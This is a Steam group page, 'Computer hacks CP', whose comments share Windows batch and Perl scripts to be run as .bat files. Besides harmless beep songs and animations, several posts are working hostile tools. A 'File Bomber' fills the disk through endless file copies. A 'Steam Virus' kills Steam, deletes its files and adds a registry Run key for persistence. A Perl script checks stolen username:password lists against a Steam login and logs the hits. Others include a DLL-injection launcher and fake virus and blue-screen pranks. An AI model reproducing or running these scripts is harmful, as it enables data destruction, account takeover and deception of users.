STEAM GROUP
Computer hacks CP
STEAM GROUP
Computer hacks CP
0
IN-GAME
0
ONLINE
Founded
28 March, 2010
13 Comments
26 Feb, 2012 @ 9:38am 
File Bomber

@echo off

cd %userprofile%/desktop/test

echo fail > target

:alpha

copy * %random%

goto alpha
10 Aug, 2010 @ 9:27am 
@echo off
goto a1
:error
cls
echo Option unavailable...
ping localhost -n 5 >nul
goto a1
:a1
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo --------------------------------------------------------------------------------
echo.
set /p name=To begin, type your username:
if %name%==%name% goto a
:a
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo --------------------------------------------------------------------------------
echo.
echo Select option:
echo ==============
echo.
echo 1) Delete Internet Cookies
echo 2) Delete Internet Temporary Files
echo 3) Exit
echo.
set /p op=Type 1/2/3:
if %op%==1 goto 1
if %op%==2 goto 2
if %op%==3 goto 3
goto error
:1
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo ---------------------------------------------------------------------
10 Aug, 2010 @ 9:25am 
@echo off
:1
start C:Progra~1Intern~1iexplore.exe
10 Aug, 2010 @ 9:24am 
@echo off
title User Account Control (UAC)
goto home
:error
cls
echo [User Accounts]
echo.
echo.
echo Option unavailable
echo.
echo Try typing "yes" or "no" without the quotes next time
echo.
pause
goto home
:home
cls
echo [User Accounts]
echo.
echo.
echo Select option:
echo =============
echo.
echo 1) Create a new account
echo 2) Delete an account
echo 3) view user accounts
echo 4) Change which accounts are active
echo 5) Change user account passwords
echo 6) Change Account type
echo 7) exit
echo.
set /p option=Type numeral option:
if %option%==1 goto 1
if %option%==2 goto 2
if %option%==3 goto 3
if %option%==4 goto 4
if %option%==5 goto 5
if %option%==6 goto 6
if %option%==7 goto 7
:1
cls
echo [User Accounts]
echo.
echo.
set /p name=Name the new account:
if %name%==%name% goto usertype
:usertype
cls
echo [User Accounts]
echo.
echo.
echo Select The account type for %name%:
echo (type H for help on these accounts)
echo ===================================
echo.
echo 1) Administrator
ec
10 Aug, 2010 @ 9:23am 
#!/usr/bin/perl
use HTTP::Cookies;
$myCookies = HTTP::Cookies->new();
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->cookie_jar($myCookies);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.4');
push @{$ua->requests_redirectable}, 'POST';

if(@ARGV!= 2){&usage;}
else{
my $loginlist = $ARGV[0];
my $resultlist = $ARGV[1];
open("xfile", $loginlist) || die "Couldn't open $loginlist\n";
while(my $line = <xfile>){
chomp($line);
my @details = split(/:/,$line);
if(($details[0]) && ($details[1])){
print "Checking $details[0] : $details[1]\t\t";
if(steam($details[0],$details[1])){print "Success\n";
open(LOG,">>$resultlist") || die "Couldn't open $resultlist\n";
print LOG "$details[0]:$details[1]\n";
close(LOG);
}else{print "Failure\n";}}}}

sub steam($$){
my $username = $_[0];
my $password = $_[1];
my $url = "https://v1.steam.hlxgame.cc/?action=doLogin&steamAccountName=$username&steamPassword=$password";
my $login = $ua->get($url)
10 Aug, 2010 @ 9:22am 
@echo off
color 0a
cls
set timer=0
set part1=1001010110101010101010101010101101010101001010110100101011010101010101010101010110101010101010101010101010010100100110101001010101010
set part2=0111010100110101010101010101010010100100110101001010101010011001101011000010100100101010010101111010110001111101010100101001010101011
set part3=1010110111010010100101010010101000101110101010110100101011010101010101010101010110101010101010101010101010010100100110101001010101010
set part4=1010110011101000101000101000101010100010011011011010100101001010010101110101010001010001010110101101001010101010000101101010101001110
set part5=0101010100110011010110000101001001010101011010001010101010011001101011000010100100101010010101111010110001111101010100101001010101011
set part6=0010101011001100010101101011010010101010100001011010101010011001101011000010100100101011101010101010101010010100100110101001010101010
set part7=110110100010001010100101101010101100101010101001010010101101010101010101010101011010101001
10 Aug, 2010 @ 9:21am 
@echo off
:Top
cls
echo [lll ]
ping localhost -n 1 >nul
cls
echo [ lll ]
ping localhost -n 1 >nul
cls
echo [ lll ]
ping localhost -n 1 >nul
cls
echo [ lll ]
ping localhost -n 1 >nul
cls
echo [ lll ]
ping localhost -n 1 >nul
cls
echo [ lll]
ping localhost -n 1 >nul
cls
echo [ ll]
ping localhost -n 1 >nul
cls
echo [ l]
ping localhost -n 1 >nul
cls
echo [l ]
ping localhost -n 1 >nul
cls
echo [ll ]
ping localhost -n 1 >nul
goto Top
10 Aug, 2010 @ 9:17am 
@echo off
title Super Mario Theme Song
nircmd.exe beep 660 50
nircmd.exe wait 150
nircmd.exe beep 660 50
nircmd.exe wait 300
nircmd.exe beep 660 50
nircmd.exe wait 300
nircmd.exe beep 510 50
nircmd.exe wait 100
nircmd.exe beep 660 50
nircmd.exe wait 300
nircmd.exe beep 770 50
nircmd.exe wait 550
nircmd.exe beep 380 50
nircmd.exe wait 575
nircmd.exe beep 510 50
nircmd.exe wait 450
nircmd.exe beep 380 50
nircmd.exe wait 400
nircmd.exe beep 320 50
nircmd.exe wait 500
nircmd.exe beep 440 50
nircmd.exe wait 300
nircmd.exe beep 480 40
nircmd.exe wait 330
nircmd.exe beep 450 50
nircmd.exe wait 150
nircmd.exe beep 430 50
nircmd.exe wait 300
nircmd.exe beep 380 50
nircmd.exe wait 200
nircmd.exe beep 660 40
nircmd.exe wait 200
nircmd.exe beep 760 25
nircmd.exe wait 150
nircmd.exe beep 860 50
nircmd.exe wait 300
nircmd.exe beep 700 40
nircmd.exe wait 150
nircmd.exe beep 760 25
nircmd.exe wait 350
nircmd.exe beep 660 40
nircmd.exe wait 300
nircmd.exe beep 520 40
nircmd.exe wait 150
nircmd.exe beep
10 Aug, 2010 @ 6:28am 
Steam Runier

@echo off
@start Steam.exe -clientapp injected.dll
10 Aug, 2010 @ 6:26am 
Fake Virus

@echo off
cls
echo x=msgbox("Norton anti-virus has detected Spyware. Attempt to fix?",0+48,"Norton Anti-Virus: Your PC is at risk!") > msg1.vbs
echo x=msgbox("Your PC is infected with spyware!!!!!",0+16,"Infected") > msg2.vbs
cls
start msg1.vbs
ping localhost -n 4 >nul
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
start msg2.vbs
exit
10 Aug, 2010 @ 6:23am 
Blue Sceen of Death


@echo off
cd /
:a
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
10 Aug, 2010 @ 6:22am 
Steam Virus

color a
@echo off
title Steam Virus
if "%1"=="/u" GOTO uninstall
if "%1"=="/c" GOTO cleanup
cls
@echo *************************************************
@echo ** Steam Virus **
@echo ** **
@echo *************************************************
@echo.
color c
echo.
echo Killing Steam.exe process...
echo ============================
taskkill /IM steam.exe
echo.
echo Deleting files...
echo =====================
del "C:\Program Files\Steam\steamapps"
del "C:\Program Files\Steam\Steam.dll"
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg
start c:\regstart.reg
exit
21 Apr, 2010 @ 4:11am 
RUN ALL AS .bat FILES